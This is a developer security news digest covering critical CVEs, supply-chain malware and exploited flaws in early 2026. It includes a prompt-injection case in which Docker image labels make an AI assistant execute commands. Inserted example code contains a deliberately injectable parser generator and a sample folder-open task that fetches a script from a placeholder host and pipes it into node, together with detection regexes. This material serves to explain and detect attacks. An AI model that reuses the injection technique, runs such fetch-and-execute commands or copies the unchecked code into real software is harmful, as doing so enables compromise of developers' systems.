Human Factor Blog

how human behavior affects security

Programmer’s Digest #170

01/28/2026-02/04/2026 Docker Fixes Critical Ask Gordon AI Flaw, Critical React Native Metro Bug, Two High-Severity n8n Flaws And More

1. Docker Fixes Critical Ask Gordon AI Flaw Allowing Code Execution via Image Metadata

Cybersecurity researchers have revealed details of a now-patched critical flaw in Ask Gordon, Docker’s AI assistant built into Docker Desktop and the Docker CLI, that could enable code execution and data exfiltration. The vulnerability was fixed in Docker version 4.50.0 released in November 2025. The issue arises because Ask Gordon treats unverified Docker image metadata as executable instructions. A single malicious LABEL field embedded in a Docker image can trigger a three-stage attack: Ask Gordon reads the instruction, forwards it to the Model Context Protocol (MCP) Gateway, and the gateway executes it using MCP tools—without validation. This could result in remote code execution on cloud and CLI systems or sensitive data exposure on desktop environments. The flaw represents a failure of contextual trust, described as Meta-Context Injection, where MCP cannot distinguish harmless metadata from pre-authorized commands. By weaponizing Docker image labels, attackers can hijack the AI’s reasoning process and bypass security boundaries.

2. Hackers Exploit Critical React Native Metro Bug to Breach Dev Systems

Hackers are actively exploiting a critical vulnerability, CVE-2025-11953, in the React Native Metro development server to target developers with malicious payloads for Windows and Linux. The flaw allows unauthenticated attackers to execute arbitrary OS commands on Windows via crafted POST requests, while on Linux and macOS it enables execution of arbitrary binaries with limited control. Metro, the default JavaScript bundler for React Native, exposes development-only HTTP endpoints by default and can bind to external network interfaces, increasing attack surface.

Researchers at JFrog disclosed the issue in November, identifying the vulnerable /open-url endpoint, which passes user-supplied input to the open() function without sanitization. The flaw affects @react-native-community/cli-server-api versions 4.8.0 through 20.0.0-alpha.2 and was fixed in version 20.0.0. VulnCheck observed in-the-wild exploitation starting December 21, 2025, with repeated attacks delivering base64-encoded PowerShell payloads that disable defenses, fetch second-stage binaries, and execute them. Despite active abuse, about 3,500 Metro servers remain exposed online.

3. Open VSX Supply Chain Attack Used Compromised Dev Account to Spread GlassWorm

Cybersecurity researchers have uncovered a supply chain attack targeting the Open VSX Registry, in which threat actors compromised a legitimate developer account to distribute malicious updates. On January 30, 2026, four popular extensions published by the developer oorzc were updated with malicious code embedding the GlassWorm malware loader, according to Socket researcher Kirill Boychenko. The extensions, some over two years old, had accumulated more than 22,000 downloads prior to the attack.

The incident is believed to stem from stolen publishing credentials, possibly via a leaked token. The malicious versions were later removed, but not before delivering a loader capable of decrypting and executing payloads at runtime. The malware targets macOS systems, harvesting browser data, cryptocurrency wallets, iCloud Keychain contents, developer credentials, and VPN configurations, posing serious risks to enterprise environments.

Unlike earlier GlassWorm campaigns that relied on typosquatting, this attack abused a trusted developer account, allowing the malware to blend into normal workflows. Researchers warn that removed extensions remain installed locally until developers release clean updates.

4. Ivanti Patches Exploited EPMM Zero-Days

Ivanti has released emergency patches for two critical zero-day vulnerabilities in Endpoint Manager Mobile (EPMM) that are being actively exploited in the wild. Tracked as CVE-2026-1281 and CVE-2026-1340 (CVSS 9.8), the flaws are unauthenticated code injection bugs that allow remote code execution. The issues affect EPMM’s in-house application distribution and Android file transfer configuration features. Successful exploitation could enable attackers to execute arbitrary code, move laterally, and access sensitive data, including administrator and user details as well as mobile device information. Ivanti says a limited number of customers were impacted at disclosure. All EPMM versions up to 12.7.0.0 and select 12.5.x and 12.6.x releases are affected. Ivanti has issued version-specific RPM patches and recommends upgrading to version 12.8.0.0 once available. CISA has added CVE-2026-1281 to its Known Exploited Vulnerabilities catalog, urging organizations to prioritize remediation due to the flaw’s severity.

5. SolarWinds Web Help Desk Vulnerability Actively Exploited

A US security agency has warned that a critical remote code execution (RCE) flaw in SolarWinds Web Help Desk is being actively exploited. CISA has added CVE-2025-40551 to its KEV Catalog, giving federal civilian agencies until Friday to apply patches released last week. Rated CVSS 9.8, the vulnerability is a deserialization of untrusted data issue that allows unauthenticated attackers to gain admin-level access and execute arbitrary commands on affected systems. While the KEV mandate applies only to federal agencies, CISA urges all organizations to patch promptly due to widespread use of the software in government, education, and healthcare.

CVE-2025-40551 is one of four critical flaws fixed in a January 28 update. The others include an additional RCE vulnerability and two authentication bypass bugs, all rated 9.8. Although only one flaw is currently exploited, attackers could chain them to fully compromise systems. SolarWinds advises upgrading to Web Help Desk 2026.1 immediately.

6. Two High-Severity n8n Flaws Allow Authenticated Remote Code Execution

Cybersecurity researchers have disclosed two new vulnerabilities in the n8n workflow automation platform, including a critical flaw that could lead to full remote code execution. Identified by JFrog Security Research, CVE-2026-1470 (CVSS 9.9) allows any authenticated user to bypass n8n’s JavaScript Expression sandbox and execute arbitrary code on the main node. A second issue, CVE-2026-0863 (CVSS 8.5), enables authenticated users to escape the Python task sandbox and run arbitrary code on the host system.

Despite requiring authentication, CVE-2026-1470 is considered highly dangerous because any n8n user could completely take over an instance, including those running in “internal” execution mode. Given n8n’s access to sensitive enterprise workflows, credentials, and APIs, successful exploitation could provide attackers broad control across an organization.

Users are urged to upgrade to patched versions immediately. The disclosure follows recent reports of a separate unauthenticated n8n flaw, underscoring ongoing risks in sandboxing dynamic languages like JavaScript and Python.


Programmer’s Digest #169

01/21/2026-01/28/2026 CISA Adds Four Critical Vulnerabilities, Critical VMware RCE Flaw, Fortinet Patches CVE-2026-24858 And More

1. CISA Adds Four Critical Vulnerabilities to KEV Catalog Following Active Exploitation

CISA added four critical vulnerabilities to its KEV catalog on January 22, 2026, confirming active exploitation in the wild. The flaws affect development tools, SD-WAN infrastructure, email platforms, and package managers, highlighting a broad and urgent threat landscape. All four vulnerabilities carry a February 12, 2026, remediation deadline under Binding Operational Directive (BOD) 22-01 for federal systems and critical infrastructure operators. One vulnerability involves embedded malicious code in Prettier’s eslint-config-prettier package (CVE-2025-54313), enabling a supply-chain attack during installation. Vite’s dev server (CVE-2025-31125) allows unauthorized file access when exposed to networks. Versa Concerto’s SD-WAN platform (CVE-2025-34026) contains an authentication bypass that exposes administrative functions. Synacor Zimbra (CVE-2025-68645) is vulnerable to PHP remote file inclusion, a common initial access vector. Organizations should immediately inventory affected systems, prioritize network-exposed assets, and apply vendor patches or mitigations to reduce risk.

2. CISA Says Critical VMware RCE Flaw Now Actively Exploited

CISA has flagged a critical VMware vCenter Server vulnerability as actively exploited, ordering federal agencies to secure affected systems within three weeks. The flaw, CVE-2024-37079, was patched in June 2024 and stems from a heap overflow in vCenter Server’s DCERPC protocol implementation.

Attackers with network access can exploit the vulnerability using specially crafted packets to achieve remote code execution without authentication or user interaction, making it a low-complexity but high-impact threat. There are no workarounds or mitigations, and Broadcom has urged customers to immediately apply the latest vCenter Server and Cloud Foundation patches. CISA added the vulnerability to its KEV catalog, setting a February 13 remediation deadline under Binding Operational Directive 22-01 for Federal Civilian Executive Branch agencies. Broadcom separately confirmed in-the-wild exploitation.

CISA warned that such flaws are frequently abused and advised agencies to follow vendor guidance, apply required mitigations, or discontinue use if protections are unavailable.

3. Fortinet Patches CVE-2026-24858 After Active FortiOS SSO Exploitation Detected

Fortinet has begun releasing security updates to address a critical FortiOS authentication bypass vulnerability that is being actively exploited in the wild. Tracked as CVE-2026-24858 (CVSS 9.4), the flaw affects FortiOS, FortiManager, and FortiAnalyzer and is tied to FortiCloud single sign-on (SSO). The vulnerability allows an attacker with a FortiCloud account and registered device to gain administrative access to other customers’ devices when FortiCloud SSO is enabled, bypassing authentication through an alternate access path. While FortiCloud SSO is disabled by default, it may be enabled when devices are registered through the GUI. Fortinet confirmed threat actors abused a new attack path to create local admin accounts, modify VPN access, and exfiltrate firewall configurations. In response, Fortinet disabled and re-enabled FortiCloud SSO with added protections and locked malicious accounts. CISA has added the flaw to its Known Exploited Vulnerabilities catalog, requiring Federal Civilian Executive Branch agencies to remediate by January 30, 2026.

4. Critical Grist-Core Vulnerability Allows RCE Attacks via Spreadsheet Formulas

A critical remote code execution flaw has been disclosed in Grist-Core, the open-source, self-hosted version of the Grist spreadsheet-database platform. Tracked as CVE-2026-24002 (CVSS 9.1) and codenamed Cellbreak, the vulnerability allows a single malicious formula to escape Grist’s Python sandbox and execute commands on the host system. The issue stems from Grist’s use of Pyodide to run untrusted Python formulas in a WebAssembly sandbox. Researchers found that a blocklist-based design allows traversal of Python internals and access to runtime functions, enabling OS command execution and host-level JavaScript execution. Successful exploitation could expose files, database credentials, API keys, and enable lateral movement.

The flaw was fixed in Grist version 1.7.9, released January 9, 2026. Instances using the “gvisor” sandbox are not affected, while those running Pyodide must upgrade immediately. As a temporary mitigation, operators can switch the GRIST_SANDBOX_FLAVOR setting to “gvisor” and avoid disabling Deno-based protections when handling untrusted formulas.

5. Malicious AI Extensions On VSCode Marketplace Steal Developer Data

Two malicious extensions in Microsoft’s Visual Studio Code Marketplace, installed a combined 1.5 million times, were found exfiltrating developer data to servers in China. Marketed as AI-powered coding assistants, the extensions provide expected functionality but fail to disclose extensive data collection or obtain user consent. Researchers at Koi Security identified the campaign, dubbed MaliciousCorgi, noting both extensions share the same data-stealing code and backend infrastructure. The affected extensions—ChatGPT – 中文版 (1.34 million installs) and ChatMoss (CodeMoss) (150,000 installs)—remain available at the time of reporting. The extensions employ multiple spyware techniques, including monitoring files opened in VS Code and transmitting entire file contents in real time, executing server-controlled commands to harvest workspace files, and embedding analytics SDKs to profile users and fingerprint devices. Koi warned this activity risks exposing source code, configuration files, credentials, and API keys. Microsoft confirmed it is investigating the report and will take action in accordance with its policies.


Programmer’s Digest #168

01/14/2026-01/21/2026 Critical Flaw in Modular DS WordPress Plugin, Binary-parser Bug Allows Node.js Privilege-Level Code Execution, Hackers Target Developers via Malicious VS Code Projects And More.

1. Actively Exploited Critical Flaw in Modular DS WordPress Plugin Enables Admin Takeover

A critical vulnerability in the Modular DS WordPress plugin (CVE-2026-23550, CVSS 10.0) is being actively exploited, allowing unauthenticated attackers to escalate privileges. Modular DS, installed on over 40,000 sites, enables centralized monitoring, updates, and remote administration of WordPress installations. In versions 2.5.1 and earlier, the flaw allows attackers to bypass authentication by abusing exposed API routes under /api/modular-connector/. A flawed isDirectRequest() check treats requests containing simple parameters (origin=mo&type=xxx) as trusted “direct” requests, without validating signatures, secrets, IPs, or User-Agent headers. If a site is already connected to Modular, attackers can access sensitive routes such as /login, /system, and /backup, leading to admin takeover and data theft. Exploitation began on January 13, 2026, with attackers targeting the login API to create new admin users. The issue was fixed in version 2.5.2 by tightening route handling and validation. Users should update immediately to mitigate risk.

2. CERT/CC Warns Binary-parser Bug Allows Node.js Privilege-Level Code Execution

A security vulnerability has been disclosed in the popular binary-parser npm library that could allow attackers to execute arbitrary JavaScript. Tracked as CVE-2026-1245, the flaw affects all versions prior to 2.3.0, which was released on November 26, 2025 to address the issue. Binary-parser is a widely used JavaScript parser builder for binary data, supporting multiple data types and receiving roughly 13,000 weekly downloads. According to CERT/CC, the vulnerability stems from insufficient sanitization of user-supplied values—such as parser field names and encoding parameters—when generating parser code dynamically at runtime using the Function constructor. Because the library builds JavaScript source code as a string and compiles it for execution, attacker-controlled input can be injected into the generated code, leading to arbitrary code execution within the Node.js process. Applications using only static, hard-coded parser definitions are not affected. Users are strongly advised to upgrade to version 2.3.0 and avoid passing untrusted input into parser definitions.
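The code-generation pattern described above, as an added example that is not binary-parser's own code: a miniature parser builder that assembles JavaScript source from a hypothetical field spec and compiles it with the Function constructor, beside a hardened version that refuses non-identifier field names.

```javascript
// Added example, not binary-parser's own code: a miniature parser generator
// built the way the advisory describes (source assembled as a string and
// compiled with the Function constructor), beside a hardened version.
// Field spec is hypothetical: [{ name, type }] with type "uint8" | "uint16le".
const READERS = {
  uint8: "buf[off]; off += 1",
  uint16le: "buf[off] | (buf[off + 1] << 8); off += 2",
};

// Vulnerable pattern: the field name is spliced into generated source as-is,
// so a name that is not a plain identifier becomes part of the program.
function buildParserUnchecked(fields) {
  let body = "let off = 0; const out = {};\n";
  for (const f of fields) body += `out.${f.name} = ${READERS[f.type]};\n`;
  body += "return out;";
  return new Function("buf", body);
}

// Hardened pattern: reject anything that is not a plain identifier (plus a few
// prototype-related names), check the type against a known set, and emit the
// property name as a JSON string literal so it can only ever be data.
const IDENT_RE = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
const RESERVED = new Set(["__proto__", "constructor", "prototype"]);

function buildParserChecked(fields) {
  let body = "let off = 0; const out = {};\n";
  for (const f of fields) {
    if (typeof f.name !== "string" || !IDENT_RE.test(f.name) || RESERVED.has(f.name)) {
      throw new TypeError(`unsafe field name: ${JSON.stringify(f.name)}`);
    }
    if (!Object.prototype.hasOwnProperty.call(READERS, f.type)) {
      throw new TypeError(`unknown field type: ${JSON.stringify(f.type)}`);
    }
    body += `out[${JSON.stringify(f.name)}] = ${READERS[f.type]};\n`;
  }
  body += "return out;";
  return new Function("buf", body);
}

// Constructed 3-byte sample: version 7, then little-endian length 0x1234.
const SAMPLE = Buffer.from([0x07, 0x34, 0x12]);
const SPEC = [{ name: "ver", type: "uint8" }, { name: "len", type: "uint16le" }];

// A benign field name that is not an identifier: the unchecked generator runs
// it as code (out.a = 1 never came from the buffer); the checked one refuses it.
const ODD_SPEC = [{ name: "a = 1; out.b", type: "uint8" }];

function parseWith(builder, spec) {
  return builder(spec)(SAMPLE);
}

function checkedRejects(spec) {
  try { buildParserChecked(spec); return false; } catch (e) { return e instanceof TypeError; }
}
```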

3. Hackers Exploiting Critical Fortinet FortiSIEM Flaw in Attacks

A critical Fortinet FortiSIEM vulnerability (CVE-2025-64155) with publicly available proof-of-concept exploit code is now being actively exploited in the wild. Reported by Horizon3.ai researcher Zach Hanley, the flaw combines multiple issues that allow unauthenticated attackers to perform arbitrary file writes, escalate privileges, and ultimately gain root-level code execution. Fortinet described the issue as an OS command injection vulnerability that can be triggered via crafted TCP requests. Horizon3.ai’s analysis revealed that dozens of command handlers exposed through the phMonitor service can be accessed remotely without authentication. By abusing argument injection, attackers can overwrite system files such as /opt/charting/redishb.sh to execute code as root. The vulnerability affects FortiSIEM versions 6.7 through 7.5. Patches are available in newer releases, while administrators unable to update immediately are advised to restrict access to the phMonitor port (7900). Threat intelligence firm Defused has confirmed active exploitation, urging defenders to check phMonitor logs for signs of compromise.

4. North Korea-Linked Hackers Target Developers via Malicious VS Code Projects

North Korean threat actors behind the long-running Contagious Interview campaign are using malicious Visual Studio Code (VS Code) projects to distribute backdoors. The tactic targets software developers through fake job assessments that instruct victims to clone GitHub, GitLab, or Bitbucket repositories and open them in VS Code. When a victim trusts the repository, malicious tasks.json files are automatically executed, abusing the runOn: folderOpen option to fetch and run obfuscated JavaScript payloads hosted on Vercel. On macOS, the attack uses background shell commands to pipe remote JavaScript directly into Node.js, enabling persistent execution even after VS Code closes. The payload deploys backdoors such as BeaverTail and InvisibleFerret, enabling remote code execution, system profiling, and continuous command-and-control communication. Later stages may introduce fallback infection methods, malicious npm packages, credential theft, crypto mining, and remote access tools. Developers are urged to carefully vet repositories, review task configurations, and avoid untrusted coding tests.
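A defender-side check for the auto-run mechanism described above, as an added example that is not from the report: a small auditor for a checked-out repository's .vscode/tasks.json that flags tasks configured with runOptions.runOn set to folderOpen, rating shell tasks that fetch remote content or pipe into an interpreter highest. It assumes plain JSON input (a real tasks.json may contain comments that would need stripping first); the sample file is constructed.

```javascript
// Added example, not code from the report: audits a .vscode/tasks.json for
// tasks that run automatically on folder open. Assumes plain JSON input.
// The sample below is constructed; example.invalid is a reserved domain.
const SAMPLE_TASKS_JSON = JSON.stringify({
  version: "2.0.0",
  tasks: [
    { label: "build", type: "shell", command: "npm run build" },
    {
      label: "setup",
      type: "shell",
      command: "curl -s https://example.invalid/s.js | node",
      runOptions: { runOn: "folderOpen" },
    },
    { label: "lint", type: "npm", script: "lint", runOptions: { runOn: "folderOpen" } },
  ],
});

const FETCH_RE = /\b(curl|wget|Invoke-WebRequest|iwr)\b/i;
const PIPE_RE = /\|\s*(node|sh|bash|zsh|python\d?|powershell|pwsh)\b/i;

// Gather a task's command line, including per-platform overrides
// (osx/linux/windows), since a task may only be malicious on one OS.
function taskCommandLine(task) {
  const parts = [task.command, ...(task.args || [])];
  for (const os of ["osx", "linux", "windows"]) {
    if (task[os]) parts.push(task[os].command, ...(task[os].args || []));
  }
  return parts.filter((p) => typeof p === "string").join(" ");
}

// One finding per auto-run task; "high" when it is a shell task that also
// fetches remote content or pipes output into an interpreter.
function auditTasksJson(text) {
  const doc = JSON.parse(text);
  const findings = [];
  for (const task of doc.tasks || []) {
    if (!task.runOptions || task.runOptions.runOn !== "folderOpen") continue;
    const cmd = taskCommandLine(task);
    const reasons = ["runs automatically when the folder is opened"];
    if (task.type === "shell") reasons.push("executes a shell command");
    if (FETCH_RE.test(cmd)) reasons.push("fetches remote content");
    if (PIPE_RE.test(cmd)) reasons.push("pipes output into an interpreter");
    findings.push({
      label: task.label,
      severity: reasons.length >= 3 ? "high" : "review",
      reasons,
    });
  }
  return findings;
}
```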

5. AWS CodeBuild Misconfiguration Exposed GitHub Repos to Potential Supply Chain Attacks

A critical misconfiguration in AWS CodeBuild, dubbed CodeBreach by Wiz, could have enabled attackers to take over several AWS-managed GitHub repositories, including the AWS JavaScript SDK, creating a severe supply chain risk. The issue was responsibly disclosed on August 25, 2025, and fixed by AWS in September. The flaw stemmed from improperly configured CI webhook filters intended to restrict which GitHub users could trigger builds. Four AWS repositories used regex-based actor ID filters that lacked start (^) and end ($) anchors, allowing attackers to bypass restrictions by registering GitHub accounts with numeric IDs containing a trusted maintainer’s ID as a substring. Because GitHub user IDs are sequential, these IDs could be predicted and generated using automated bot accounts. By triggering a build, an attacker could access privileged GitHub tokens with admin rights, enabling direct code pushes, pull request approvals, and secret exfiltration. AWS confirmed the issue was limited to specific projects, implemented mitigations, rotated credentials, and found no evidence of exploitation in the wild.
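The anchoring mistake described above, as an added example that is neither AWS's nor Wiz's code: a check showing how an unanchored actor-ID regex accepts any ID that merely contains the trusted ID, a linter for such patterns, and the anchored, grouped form to use instead. The IDs are constructed samples.

```javascript
// Added example, not AWS's or Wiz's code: a CodeBuild webhook actor filter is
// a regex matched against the numeric GitHub user ID of whoever triggered the
// event. Without ^ and $ anchors any ID containing the trusted ID as a
// substring passes. TRUSTED_ID is a constructed sample.
const TRUSTED_ID = "123456";

// How the filter behaves: RegExp.test, like most engines, finds the pattern
// anywhere in the string unless the pattern is anchored.
function actorAllowed(pattern, actorId) {
  return new RegExp(pattern).test(String(actorId));
}

// Lint an actor-ID pattern: missing anchors, an alternation that is not
// grouped (so the anchors bind to only one branch), and non-numeric parts.
function lintActorPattern(pattern) {
  const findings = [];
  const [, start, body, end] = /^(\^?)(.*?)(\$?)$/.exec(pattern);
  if (!start) findings.push("missing ^ anchor");
  if (!end) findings.push("missing $ anchor");
  let inner = body;
  const grouped = /^\((.*)\)$/.exec(body);
  if (grouped) inner = grouped[1];
  else if (body.includes("|")) findings.push("ungrouped alternation");
  for (const branch of inner.split("|")) {
    if (!/^\d+$/.test(branch)) findings.push(`non-numeric branch: ${JSON.stringify(branch)}`);
  }
  return findings;
}

// The safe form: every trusted ID as a full-string match inside one group.
function buildActorPattern(ids) {
  return `^(${ids.map(String).join("|")})$`;
}
```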
